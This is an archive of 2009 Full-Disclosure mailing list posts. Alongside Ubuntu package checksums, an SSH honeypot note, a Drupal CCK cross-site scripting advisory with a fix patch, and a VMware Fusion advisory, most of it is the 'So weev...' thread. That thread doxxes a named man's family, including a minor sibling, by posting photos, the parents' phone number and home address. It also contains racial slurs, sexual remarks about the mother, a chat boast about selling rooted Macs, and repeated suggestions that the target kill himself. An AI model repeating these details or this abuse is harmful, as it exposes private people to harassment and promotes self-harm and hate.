G3/G4/G5): http://ports.ubuntu.com/pool/main/o/openoffice.org/libmythes-dev_3.0.1-9ubuntu3.1_powerpc.deb Size/MD5: 157452 84f1b59f361b9f7d8dc1bf6479592e8d http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-base-core_3.0.1-9ubuntu3.1_powerpc.deb Size/MD5: 381724 34180a5a311d9bd81cc39ce88609bf3c http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-base_3.0.1-9ubuntu3.1_powerpc.deb Size/MD5: 1668362 daa6a042fa9f93957403196ef52e30c5 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-calc_3.0.1-9ubuntu3.1_powerpc.deb Size/MD5: 3855988 1f5397f401ffaebcd49afb824512e5f7 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-core_3.0.1-9ubuntu3.1_powerpc.deb Size/MD5: 22694952 55987e4cc4cbcf1a29b02630785e1fe6 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-dev_3.0.1-9ubuntu3.1_powerpc.deb Size/MD5: 2431828 4bf5ce654ffceee4a16fe429ae4a8ce8 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-draw_3.0.1-9ubuntu3.1_powerpc.deb Size/MD5: 1908712 7ecf5d8b27ae3a9b1bd5bc0b25b3037d http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-evolution_3.0.1-9ubuntu3.1_powerpc.deb Size/MD5: 58218 d88682d2af2a988e2bfcca9ac28e86c0 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-filter-binfilter_3.0.1-9ubuntu3.1_powerpc.deb Size/MD5: 5125392 3b740a2d8876e2ced3543bebddc03801 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-gnome_3.0.1-9ubuntu3.1_powerpc.deb Size/MD5: 3010 04bc17d2f5c63868150c92dabe1af147 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-gtk_3.0.1-9ubuntu3.1_powerpc.deb Size/MD5: 145774 fb2e789d2a483de63a80b0170b21d159 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-impress_3.0.1-9ubuntu3.1_powerpc.deb Size/MD5: 334830 bd24aa6b04c9706abe443bc53ff1ccbc http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-kde_3.0.1-9ubuntu3.1_powerpc.deb Size/MD5: 79846 e5c8cc14e8175f568aa3a3380fe19c41 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-math_3.0.1-9ubuntu3.1_powerpc.deb Size/MD5: 195372 6707ed25939b45bf12712a2d261b7397 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-officebean_3.0.1-9ubuntu3.1_powerpc.deb Size/MD5: 47580 dfddac29beccd34db4065cf3901f0d03 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-report-builder-bin_3.0.1-9ubuntu3.1_powerpc.deb Size/MD5: 783930 a06bedb72ea80c1d7bfb9bfc18257c40 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-writer_3.0.1-9ubuntu3.1_powerpc.deb Size/MD5: 5102014 7c34a1f60bf015223990ce4f0621a458 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org_3.0.1-9ubuntu3.1_powerpc.deb Size/MD5: 5094 9ad99c3526f9bbc43bb0fbed9bdceba6 http://ports.ubuntu.com/pool/main/o/openoffice.org/python-uno_3.0.1-9ubuntu3.1_powerpc.deb Size/MD5: 86914 2948caae709a4320ee5cd9feb4c91a89 http://ports.ubuntu.com/pool/main/o/openoffice.org/uno-libs3-dbg_1.4.1+OOo3.0.1-9ubuntu3.1_powerpc.deb Size/MD5: 203662 88731b68dcde1e5fc14cce1fedd91223 http://ports.ubuntu.com/pool/main/o/openoffice.org/uno-libs3_1.4.1+OOo3.0.1-9ubuntu3.1_powerpc.deb Size/MD5: 1004736 0a7c74bb7d06ef836f0b5e15851267f8 http://ports.ubuntu.com/pool/main/o/openoffice.org/ure-dbg_1.4.1+OOo3.0.1-9ubuntu3.1_powerpc.deb Size/MD5: 203486 cc170a0eb6b2bec54263c33ee04bcf3a http://ports.ubuntu.com/pool/main/o/openoffice.org/ure_1.4.1+OOo3.0.1-9ubuntu3.1_powerpc.deb Size/MD5: 1225748 0f6ab58fcbba174a0b9da8b69f7d8a28 http://ports.ubuntu.com/pool/universe/o/openoffice.org/mozilla-openoffice.org_3.0.1-9ubuntu3.1_powerpc.deb Size/MD5: 30240 1deee7ed69e4401701b97684a37fe44f http://ports.ubuntu.com/pool/universe/o/openoffice.org/openoffice.org-kab_3.0.1-9ubuntu3.1_powerpc.deb Size/MD5: 270002 b168e16628134f18a36a9eee938d6653 http://ports.ubuntu.com/pool/universe/o/openoffice.org/openoffice.org-pdfimport_0.3.2+OOo3.0.1-9ubuntu3.1_powerpc.deb Size/MD5: 790108 8f2f3741e94f01e7d2497283386dc9aa http://ports.ubuntu.com/pool/universe/o/openoffice.org/openoffice.org-presentation-minimizer_1.0+OOo3.0.1-9ubuntu3.1_powerpc.deb Size/MD5: 310694 320f8c2abd6d975cb3805a7d0ca79f09 http://ports.ubuntu.com/pool/universe/o/openoffice.org/openoffice.org-presenter-console_1.0+OOo3.0.1-9ubuntu3.1_powerpc.deb Size/MD5: 859202 9b39d721cc8d2b4a0fc048c91395e489 http://ports.ubuntu.com/pool/universe/o/openoffice.org/openoffice.org-sdbc-postgresql_0.7.6+OOo3.0.1-9ubuntu3.1_powerpc.deb Size/MD5: 426686 9b9fc3ccb35d3578af83d7132f173f35 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 197 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091001/89947853/attachment-0001.bin From my.hndl at gmail.com Fri Oct 2 00:37:52 2009 From: my.hndl at gmail.com (my.hndl) Date: Thu, 1 Oct 2009 16:37:52 -0700 Subject: [Full-disclosure] Modifying SSH to Capture Login Credentials from Attackers In-Reply-To: References: Message-ID: Follow up posted, which includes: - analysis of some tools most likely used against me - information on an operator of a botnet very similar to the one that was attacking me - code samples, screenshots, etc. http://paulmakowski.wordpress.com/2009/09/30/from-pass_file-to-script-kiddies/ On Tue, Sep 29, 2009 at 12:25 PM, my.hndl wrote: > If you've ever had your SSH server dictionary attacked and wondered what > usernames / passwords the attackers were trying... > > I've posted detailed instructions on modifying openssh on Ubuntu 9.04 in > order to log username / password attempts made by bots. This information > can then be used to track down the tools / dictionaries being used against > you, and may even lead to discovery of IRC command & control channels used > by the botnet herders/masters (the topic of my next post). > > Full username / password logs included for your enjoyment: > http://paulmakowski.wordpress.com/2009/09/28/hacking-sshd-for-a-pass_file/ > > Intended for novices interested in honeypots. > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091001/121473d0/attachment.html From gobbles1337 at Safe-mail.net Fri Oct 2 00:54:06 2009 From: gobbles1337 at Safe-mail.net (GOBBLES) Date: Thu, 1 Oct 2009 19:54:06 -0400 Subject: [Full-disclosure] So weev... Message-ID: Greetings. I'd like to chime in here and mirror this. Crime is bad. So is the subversive rhetoric that is drains the resources of law enforcement, and in actuality, because of it's abusive nature increases the likely we'll lose our liberties if you do something stupid. You have any idea the harassment I've faced because of you, idiot? You are doing bad things, Andrew. http://seclists.org/fulldisclosure/2009/Oct/0013.html Mirror #1 (http://www.webcitation.org/5kD6O0OEd) Chelsea Auernheimer ============= http://www.zinch.com/z/Nouchii Mirror #1 (http://www.webcitation.org/5kD6PnDyk) http://timesdispatch.mycapture.com/mycapture/enlarge.asp?image=23447816&event=745571&CategoryID=20789 Mirror #1 (http://img44.imageshack.us/img44/1253/23447816e.jpg) Mirror #2 (http://img.waffleimages.com/4e970a16670a3fa57db1b88fee2adebef617e98a/23447816e.jpg) Anthony Auernheimer ============== http://twitter.com/Antsauercool Mirror #1 (http://www.webcitation.org/5kD6SestP) http://timesdispatch.mycapture.com/mycapture/enlarge.asp?image=23447820&event=745571&CategoryID=20789 Mirror #1 (http://img19.imageshack.us/img19/4606/23447820e.jpg) Mirror #2 (http://img.waffleimages.com/ef136fdba21217188b1dd4d374148d48d1afa145/23447820e.jpg) Mommy Auernheimer ============== http://imgur.com/AQpSd.jpg Mirror #1 (http://img19.imageshack.us/img19/1967/aqpsd.jpg) Mirror #2 (http://img.waffleimages.com/41c1f9036d350871dbedf177ffd1109cf3bc6ab8/aqpsd.jpg) Daddy Auernhiemer (SealPac CEO) ============== http://imgur.com/CEaNX.jpg Mirror #1 (http://img19.imageshack.us/img19/4673/ceanx.jpg) Mirror #2 (http://img.waffleimages.com/35414c5ec9e246bd42f2e4372abe51f836ed6867/ceanx.jpg) I hate to bring family into this, but weev, you've shown no more regard for the families of others. You have been senseless toward others. And also remember to submit any pertinent evidence or testimony to your local FBI office or http://tips.fbi.gov Sincerely, Paul P.S. Yes I'm Jewish. No, I didn't buy my way into Christianity. Liar. -------- Original Message -------- From: "Wintermute" Apparently from: full-disclosure-bounces at lists.grok.org.uk To: full-disclosure at lists.grok.org.uk Subject: [Full-disclosure] So weev... Date: Thu, 01 Oct 2009 12:14:49 -0500 > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > How does it feel to be a hypocrite? And we quote: > > 22:02 im all for white people cleaning up the nigger problem > 22:03 i hate niggers > 22:03 i hate niggers. > > Now besides the fact that weev is an annoying little bitch who > cannot seem to find better things to do with his time than augment > his racist troll persona, there is a larger irony here: he has two > younger siblings who are black. Not that we the undersigned have a > problem with this, but our spidey sense tells us that weev does not > want you to know. Thus, let us present... > > Chelsea and Anthony Auernheimer! Chelsea started as a college > freshman this year. She is smart and she loves animals. More about > Chelsea: > > http://www.zinch.com/z/Nouchii > http://timesdispatch.mycapture.com/mycapture/enlarge.asp?image=23447 > 816&event=745571&CategoryID=20789 (pic) > > Anthony is a 9th grader. You can follow him on Twitter here: > http://twitter.com/Antsauercool. As a picture is also in order for > him: > http://timesdispatch.mycapture.com/mycapture/enlarge.asp?image=23447 > 820&event=745571&CategoryID=20789 > > Now, we would love to know what these two think of their racist > asshole brother, but have had the common courtesy not to bother > them with our query. We did, however, more than momentarily > entertain the idea of getting in touch with weev's parents to > attempt to discover what has made him the way he is. Weev's mother > (http://imgur.com/AQpSd.jpg) is a board member of the Richmond PTA > and made contributions to the Democratic Party last year. She seems > like a nice person. His father (http://imgur.com/CEaNX.jpg), on the > other hand, is in his mid 40's, has been CEO of Sealpac USA for the > last two years, and is by all accounts a great guy. Either parent > is available for comment at (804) 355-2889. If you would prefer > postal correspondence, letters can be mailed to: > > 2038 W Grace St > Richmond, VA 23220 > > Now, being the troll that he is, weev has no problem with living a > lie. His recent claim, > > > As I said, I haven't ever committed a crime. I am a truly sinless > man. > > ...is humorous when compared with this admission, delivered while > smoking moonrocks: > > 15:05 does anybody know these russians > 15:06 that they are buying up hacked macs for 43 cents an > install > 15:26 i have access to like > 15:26 8k rooted macs > 15:26 right now > 15:26 and i would like to make a quick $3500 > > But we cannot really blame the guy. Our hearts goes out to him when > we see admissions such as this: > > 09:50 i gotta get some money > 09:50 my cashflow sucks > 09:51 whores > 09:51 lavish cars > 09:51 gigantic places to live > > Actually, scratch that. We just kind of LOL at the iProphet and > imagine him LOLing back. > > And that is all well and good. Standard operating procedure in the > life of a troll, along with playing some Sims, getting high with > whatever psychoactives he can get his grubby paws on, making stupid > videos, and generally proving that he does not know what the fuck > he is doing with his life. Is weev's current life better than his > past attempt at freelance web and graphic design? Maybe. He kinda > sucked at that too. But come on, man, at least aspire to > *something*. > > Weev, the joke is old. Your number is up. Shut up or shape up. Your > docs have been pulled. We are ready to drop them at a moment's > notice, but we momentarily stop to wonder if it would even be worth > it. The devil is in the details, and yours have cocked the gun that > has been aimed at your foot for a while. Karma has more butthurt > waiting for you (in the form of "us") than you know what to do > with. Oh, and a representative in Anaheim has been alerted and will > be handling this case personally. > > We are, as always, the collective. An agent is standing by to > assist you with any contentions, queries, or comments resulting > from this transmission. > > WINTERMUTE > -----BEGIN PGP SIGNATURE----- > Charset: UTF8 > Version: Hush 3.0 > Note: This signature can be verified at https://www.hushtools.com/verify > > wpwEAQMCAAYFAkrE44kACgkQAN7xmh8YPB2wrQP/QNzi1E+IfPvbVJr6wsxs9+wjknqe > Qc3UAC6hSW3xPB7kwDR9g9i0WUhCjlMO9f78YXDkW0xqJ33FWhpj0zQHwmtOp7rMSXie > MeeHIihWf/T5tcPBgNPOqFIqjIWm/GiGcQXrn7Ifmd2+lDZ3vf9nK2/lsgSUyPqPVtge > 20blkg8= > =JvuW > -----END PGP SIGNATURE----- > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ From gobbles1337 at Safe-mail.net Fri Oct 2 03:15:08 2009 From: gobbles1337 at Safe-mail.net (GOBBLES) Date: Thu, 1 Oct 2009 22:15:08 -0400 Subject: [Full-disclosure] So weev... Message-ID: She's gorgeous and looks like a great mother. I'm totally surprised, he sounds like he has the nicest family in the world. Mom http://imgur.com/AQpSd.jpg / (http://img19.imageshack.us/img19/1967/aqpsd.jpg) / (http://img.waffleimages.com/41c1f9036d350871dbedf177ffd1109cf3bc6ab8/aqpsd.jpg) / (http://hosting11.imagecross.com/image-hosting-th-16/953aqpsd.jpg) / (http://www.freeimagehosting.net/uploads/af64fe986f.jpg) / (http://www.uploadgeek.com/thumb-CA81_4AC55843.jpg) / (http://www.imagehuge.com/out.php/t16155_aqpsd.jpg) / (http://images.imagenonline.com/img_a190867.jpg) / (http://www.desiupload.com/out.php/t325733_aqpsd.jpg) Dad http://imgur.com/CEaNX.jpg / (http://img19.imageshack.us/img19/4673/ceanx.jpg) / (http://img.waffleimages.com/35414c5ec9e246bd42f2e4372abe51f836ed6867/ceanx.jpg) / (http://www.uploadgeek.com/thumb-A304_4AC5594B.jpg) / (http://www.freeimagehosting.net/uploads/6db22e9e83.jpg) / (http://hosting11.imagecross.com/image-hosting-th-16/6430dad.jpg) / (http://www.desiupload.com/out.php/t325734_dad.jpg) / (http://www.imagehuge.com/out.php/i16156_dad.jpg) / (http://images.imagenonline.com/img_a190870.jpg) Look how Andrew Auernheimer has his dad's lip and mom's eyes and cheeks: Mirror #1: http://img.waffleimages.com/239fb622e4e5188627f39af8045575a70182f8c7/569px-Internet_business.jpg Mirror #2: http://img8.imageshack.us/img8/7586/569pxinternetbusiness.jpg Mirror #3: http://imgur.com/V5hkG.jpg That's a popular image of weev. The only psychological explanation I have for it is weev felt jealous of the connection between his dad on his mom because dad loved mom so much... And Andrew perceived himself as being neglected. Hell, can you blame him? His mom is so beautiful. -------- Original Message -------- From: BMF To: GOBBLES Subject: Re: [Full-disclosure] So weev... Date: Thu, 1 Oct 2009 18:46:25 -0700 > On Thu, Oct 1, 2009 at 4:54 PM, GOBBLES wrote: > > Mommy Auernheimer > > ============== > > http://imgur.com/AQpSd.jpg > > Dude...I would totally hit dat...Anyone know when Daddy Auernheimer > works? Cuz I wanna call up mommy Auernheimer at (804) 355-2889 and > make an appointment. From justin at madirish.net Fri Oct 2 03:59:17 2009 From: justin at madirish.net (Justin Klein Keane) Date: Thu, 01 Oct 2009 22:59:17 -0400 Subject: [Full-disclosure] Drupal CCK 5.x-1.10 XSS Vulnerability Message-ID: <4AC56C85.3060104@madirish.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Description of Vulnerability: - ----------------------------- Drupal (http://drupal.org) is a robust content management system (CMS) written in PHP and MySQL that provides extensibility through various third party modules. The CCK module (http://drupal.org/project/cck) "allows you to add custom fields to nodes using a web browser." The CCK module version 5.x-1.10 contains a cross site scripting vulnerability because it does not properly sanitize output of group labels before display. Systems affected: - - - - ----------------- Drupal 5.19 with CCK 5.x-1.10 was tested and shown to be vulnerable. Impact: - - - - ------- XSS vulnerabilities may expose site administrative accounts to compromise which could lead to web server process compromise. Mitigating factors: - - - - ------------------- The CCK module must be installed. To carry out a CCK based XSS exploit the attacker must have 'administer content types' permission. Proof of Concept: - - - --------------------- 1. Install Drupal 5 2. Install CCK 5.x-1.10 3. Enable the CCK module from Administer -> Site building -> Modules and enable all CCK modules 4. From Administer -> Content management -> Content types and click the 'edit' link next to the 'Page' content type 5. Click the 'Add group' tab at the top 6. Enter "" as the label and save the group by clicking the 'Add' button at the bottom of the form 7. On form submission you ill be redirected to /?q=admin/content/types/page/fields and the JavaScript will be rendered and execute three times. Technical details: - - - ------------------------ The CCK module fails to sanitize the output of the CCK group label before display on lines 248 and 285 of content_admin.inc. Applying the following patch fixes this vulnerability. Patch - - - ------- Applying the following patch mitigates these threats. $ diff -up cck/content_admin.inc cck_fixed/content_admin.inc - - --- cck/content_admin.inc 2008-09-03 09:45:05.000000000 -0400 +++ cck_fixed/content_admin.inc 2009-10-01 15:35:04.364195774 -0400 @@ -245,7 +245,7 @@ function theme_content_admin_field_overv $row[] = drupal_render($form['field-groups'][$fname]); break; default: - - - $row[] = array('data' => $cell, 'class' => $class); + $row[] = array('data' => filter_xss($cell), 'class' => $class); } } @@ -282,7 +282,7 @@ function theme_content_admin_field_overv // add the group row in its own table above the group fields table, then reset $row(). $fieldset = array( - - - '#title' => t('!label (!name)', array('!label' => $form['#group_labels'][$fname], '!name' => $fname)), + '#title' => t('!label (!name)', array('!label' => filter_xss($form['#group_labels'][$fname]), '!name' => $fname)), '#collapsible' => TRUE, '#collapsed' => FALSE, '#value' => theme('table', array(), array(array('data' => $row, 'class' => 'content-field-overview-group'))) . theme('table', $header, $grows), Vendor Response - --------------- Vendor replies that because the vulnerability requires "administer content types" privilege to exploit, they will not release a security announcement. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) Comment: Using GnuPG with Mandriva - http://enigmail.mozdev.org iPwEAQECAAYFAkrFbIUACgkQkSlsbLsN1gD9uAcAkpzYFoh1Z+cE6VQlAuuHRYtT yF/PlmeWdrosXEVGe7ELJw5tv1EbbopeUlIU3D9tH0tftU4Jt1ptTR8j7WMBPQ9E DeY3wDawxlrkeKmtLtyP9Wq3nZmJARb4518Cx0hMoyt4SIVWpJvgk6AenumpEKO2 DHyTCVyQ7EEWmui1L4eDIIJz4JG4JMJxRK/VZkZhg0ikVIfpE8YP1OvhJjpYo1v5 dH/RP/5sks3Lj9I4zHE1XImeLQRsgBvSPC8PmrPJ+D4g8T1Uw8zkGfYCUhrCFeFC 1OttfJI6m/J4tWxwTPE= =aG9O -----END PGP SIGNATURE----- From mrxisaplant at hush.com Fri Oct 2 04:22:40 2009 From: mrxisaplant at hush.com (TheLearner) Date: Fri, 02 Oct 2009 03:22:40 +0000 Subject: [Full-disclosure] So weev... Message-ID: <20091002032240.C0EFE28039@smtp.hushmail.com> I posted on here earlier as netdev.doctor questioning weev on how he feels psychologically. *spins weev around* *grins* You came from the net, You planted your seeds of hatred and now with nature you fall here. I feel such invigorating justice seeing your real identity mirrored. Redundancy. Freedom of information. I hypothesize weev may possibly kill himself, unfortunately. I'm unsure how to approach it because I hear he may have left the United States. If not, he'll cling on like a Michael Crook kinda guy (which he is closely emulating nowadays). These kids are like mean infants. If I were in your shoes, I would intellectually be considering ending my life. However that's just me. I don't think you should. However, if it were me, it would stop the pain, and my life path that I really couldn't ever fix now. From jdl at mac.hush.com Fri Oct 2 04:43:12 2009 From: jdl at mac.hush.com (GOBBLES) Date: Fri, 02 Oct 2009 03:43:12 +0000 Subject: [Full-disclosure] So weev... Message-ID: <20091002034312.945CA118036@smtp.hushmail.com> I posted on here earlier as netdev.doctor questioning weev on how he feels psychologically. *spins weev around* *grins* I feel such invigorating justice seeing your real identity mirrored. Redundancy. Freedom of information. I hypothesize weev may possibly kill himself, unfortunately. I'm unsure how to approach it because I hear he may have left the United States. If not, he'll cling on like a Michael Crook kinda guy (which he is closely emulating nowadays). These kids are like mean infants. If I were in your shoes, I would intellectually be considering ending my life. However that's just me. I don't think you should. However, if it were me, it would stop the pain, and my life path that I really couldn't ever fix now. This is purity. This is what happens when you become arrogant, come down here with orders from God. You get crucified bitch. Just like Jesus. Your hung on a cross the same place you ruined people's lives. plz advz hep From security at vmware.com Fri Oct 2 06:11:05 2009 From: security at vmware.com (VMware Security team) Date: Thu, 01 Oct 2009 22:11:05 -0700 Subject: [Full-disclosure] VMSA-2009-0013 VMware Fusion resolves two security issues Message-ID: <4AC58B69.3000008@vmware.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ VMware Security Advisory Advisory ID: VMSA-2009-0013 Synopsis: VMware Fusion resolves two security issues Issue date: 2009-10-01 Updated on: 2009-10-01 (initial release of advisory) CVE numbers: CVE-2009-3281 CVE-2009-3282 - ------------------------------------------------------------------------ 1. Summary VMware Fusion 2.0.6 addresses a denial of service and code execution vulnerability 2. Relevant releases VMware Fusion 2.0.5 and earlier. 3. Problem Description VMware Fusion is a product that allows you to seamlessly run your favorite Windows applications on any Intel-based Mac. a. Kernel code execution vulnerability An file permission problem in the vmx86 kernel extension allows for executing arbitrary code in the host system kernel context by an unprivileged user on the host system. VMware would like to thank Neil Kettle of Convergent Network Solutions for reporting this issue to us. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2009-3281 to this issue. b. Kernel denial of service vulnerability An integer overflow vulnerability in the vmx86 kernel extension allows for a denial of service of the host by an unprivileged user on the host system. VMware would like to thank Neil Kettle of Convergent Network Solutions for reporting this issue to us. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2009-3282 to this issue. To remediate the above issues update your product using the table below. VMware Product Running Replace with/ Product Version on Apply Patch ============= ======== ======= ================= VirtualCenter any Windows not affected Workstation 6.5.x Windows not affected Workstation 6.5.x Linux not affected Player 2.5.x Windows not affected Player 2.5.x Linux not affected ACE 2.5.x any not affected Server any any not affected Fusion any Mac OS/X Fusion 2.0.6 build 196839 ESXi any ESXi not affected ESX any ESX not affected 4. Solution Please review the patch/release notes for your product and version and verify the md5sum and/or the sha1sum of your downloaded file. VMware Fusion 2.0.6 (for Intel-based Macs): Download including VMware Fusion and a 12 month complimentary subscription to McAfee VirusScan Plus 2009 md5sum: d35490aa8caa92e21339c95c77314b2f sha1sum: 9c41985d754ac718032a47af8a3f98ea28fddb26 VMware Fusion 2.0.6 (for Intel-based Macs): Download including only VMware Fusion software md5sum: 2e8d39defdffed224c4bab4218cc6659 sha1sum: 453d54a2f37b257a0aad17c95843305250c7b6ef 5. References CVE numbers http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3281 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3282 - ------------------------------------------------------------------------ 6. Change log 2009-10-01 VMSA-2009-0013 Initial security advisory after release of Fusion 2.0.6 on 2009-10-01 - ----------------------------------------------------------------------- 7. Contact E-mail list for product security notifications and announcements: http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce This Security Advisory is posted to the following lists: * security-announce at lists.vmware.com * bugtraq at securityfocus.com * full-disclosure at lists.grok.org.uk E-mail: security at vmware.com PGP key at: http://kb.vmware.com/kb/1055 VMware Security Center http://www.vmware.com/security VMware security response policy http://www.vmware.com/support/policies/security_response.html General support life cycle policy http://www.vmware.com/support/policies/eos.html VMware Infrastructure support life cycle policy http://www.vmware.com/support/policies/eos_vi.html Copyright 2009 VMware Inc. All rights reserved. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (MingW32) iD8DBQFKxYtnS2KysvBH1xkRAgZjAJ9xF6r9OKjHc4iayvPz0VEiLf2T6QCfdglG 7vvN45BLtMo4BuHfCGRGHo4= =y8E6 -----END PGP SIGNATURE----- From wintermute at hush.com Fri Oct 2 07:42:00 2009 From: wintermute at hush.com (Wintermute) Date: Fri, 02 Oct 2009 01:42:00 -0500 Subject: [Full-disclosure] So weev... Message-ID: <20091002064200.C48CA28039@smtp.hushmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 We are glad this is being taken well: 02:23 i read what the kikes did to you 02:23 i raged :( 02:24 lol 02:24 i dont mind 02:24 theyre doin me a favor ...because as a 5'4", 130-pound guy, there is not much that you can do *but* take this sort of thing well. We would not want to see little Andrew overexert himself. WINTERMUTE On Thu, 01 Oct 2009 22:43:12 -0500 GOBBLES wrote: >I posted on here earlier as netdev.doctor questioning weev on how >he feels psychologically. > >*spins weev around* >*grins* > >I feel such invigorating justice seeing your real identity >mirrored. Redundancy. Freedom of information. > >I hypothesize weev may possibly kill himself, unfortunately. I'm >unsure how to approach it because I hear he may have left the >United States. If not, he'll cling on like a Michael Crook kinda >guy (which he is closely emulating nowadays). > >These kids are like mean infants. > >If I were in your shoes, I would intellectually be considering >ending my life. However that's just me. > >I don't think you should. However, if it were me, it would stop >the >pain, and my life path that I really couldn't ever fix now. > >This is purity. This is what happens when you become arrogant, >come down here with orders from God. You get crucified bitch. >Just like Jesus. Your hung on a cross the same place you ruined >people's lives. > >plz advz >hep > >_______________________________________________ >Full-Disclosure - We believe in it. >Charter: http://lists.grok.org.uk/full-disclosure-charter.html >Hosted and sponsored by Secunia - http://secunia.com/ -----BEGIN PGP SIGNATURE----- Charset: UTF8 Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 3.0 wpwEAQMCAAYFAkrFoLgACgkQAN7xmh8YPB3xOwP/YUfwdfS+i/towpDsMKZVZPYOOfmB HcKiqGAKoA0pZzbBZmwtDL8AtoP3O4rY7/SuDEDmukGBv2cJ25JSWqtlB7xqF1Xm0HsL BPCwhO5/2bBk4UCYHAKlbM1DpzauqYQBFcoRk6peWZV0TNdSWV2d+VK5HX6JX15FNzxO 8sZ4Wdk= =J2Jd -----END PGP SIGNATURE----- From wintermute at hush.com Fri Oct 2 07:22:09 2009 From: wintermute at hush.com (Wintermute) Date: Fri, 02 Oct 2009 01:22:09 -0500 Subject: [Full-disclosure] So weev... Message-ID: <20091002062209.5464928039@smtp.hushmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Thu, 01 Oct 2009 21:15:08 -0500 GOBBLES wrote: >She's gorgeous and looks like a great mother. > >I'm totally surprised, he sounds like he has the nicest family in >the world. They do sound nice, bless their hearts. We should have mentioned it earlier, but pops's name is Mark, and Mommy Weev is Catherine, although she has taken to going by Alyse as of late. Contact was initiated with them after our original post, and they claim they have not talked to or seen Andrew in over two years. It appears, sadly, that weev's destructive tendencies have affected even his immediate family. WINTERMUTE -----BEGIN PGP SIGNATURE----- Charset: UTF8 Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 3.0 wpwEAQMCAAYFAkrFnBEACgkQAN7xmh8YPB18uQQAn34MjmJYHuX7VBjNFEK+fiWLi4Aw Kozxgqg5n2N+73chKDB2L76xExy+EhMPBg+nwZmnVO/81DGnb+DdHFCMnmnwhj5j0Ffn WzJjkB1Me7SCJoJ7Cy60D0+wXXG4QcnpV0JhS9D2PBpLVtCVJv4ym9qP/AOYf5TPSzxU Wqp32QI= =ukGL -----END PGP SIGNATURE----- From yirimyah at gmail.com Fri Oct 2 08:02:05 2009 From: yirimyah at gmail.com (dramacrat) Date: Fri, 2 Oct 2009 17:02:05 +1000 Subject: [Full-disclosure] So weev... In-Reply-To: <20091002064200.C48CA28039@smtp.hushmail.com> References: <20091002064200.C48CA28039@smtp.hushmail.com> Message-ID: <173d1e2f0910020002g682b2520m5cdc3de7bd93b28b@mail.gmail.com> Man, you guys are real elite hackers. You can get into *#ed* and read the chat. Holy fuck, you penetrated the public channel of Encyclopedia Dramatica, which as we all know is the world's most elite hacker crew. 2009/10/2 Wintermute > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > We are glad this is being taken well: > > 02:23 i read what the kikes did to you > 02:23 i raged :( > 02:24 lol > 02:24 i dont mind > 02:24 theyre doin me a favor > > ...because as a 5'4", 130-pound guy, there is not much that you can > do *but* take this sort of thing well. We would not want to see > little Andrew overexert himself. > > WINTERMUTE > > On Thu, 01 Oct 2009 22:43:12 -0500 GOBBLES wrote: > >I posted on here earlier as netdev.doctor questioning weev on how > >he feels psychologically. > > > >*spins weev around* > >*grins* > > > >I feel such invigorating justice seeing your real identity > >mirrored. Redundancy. Freedom of information. > > > >I hypothesize weev may possibly kill himself, unfortunately. I'm > >unsure how to approach it because I hear he may have left the > >United States. If not, he'll cling on like a Michael Crook kinda > >guy (which he is closely emulating nowadays). > > > >These kids are like mean infants. > > > >If I were in your shoes, I would intellectually be considering > >ending my life. However that's just me. > > > >I don't think you should. However, if it were me, it would stop > >the > >pain, and my life path that I really couldn't ever fix now. > > > >This is purity. This is what happens when you become arrogant, > >come down here with orders from God. You get crucified bitch. > >Just like Jesus. Your hung on a cross the same place you ruined > >people's lives. > > > >plz advz > >hep > > > >_______________________________________________ > >Full-Disclosure - We believe in it. > >Charter: http://lists.grok.org.uk/full-disclosure-charter.html > >Hosted and sponsored by Secunia - http://secunia.com/ > -----BEGIN PGP SIGNATURE----- > Charset: UTF8 > Note: This signature can be verified at https://www.hushtools.com/verify > Version: Hush 3.0 > > wpwEAQMCAAYFAkrFoLgACgkQAN7xmh8YPB3xOwP/YUfwdfS+i/towpDsMKZVZPYOOfmB > HcKiqGAKoA0pZzbBZmwtDL8AtoP3O4rY7/SuDEDmukGBv2cJ25JSWqtlB7xqF1Xm0HsL > BPCwhO5/2bBk4UCYHAKlbM1DpzauqYQBFcoRk6peWZV0TNdSWV2d+VK5HX6JX15FNzxO > 8sZ4Wdk= > =J2Jd > -----END PGP SIGNATURE----- > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia 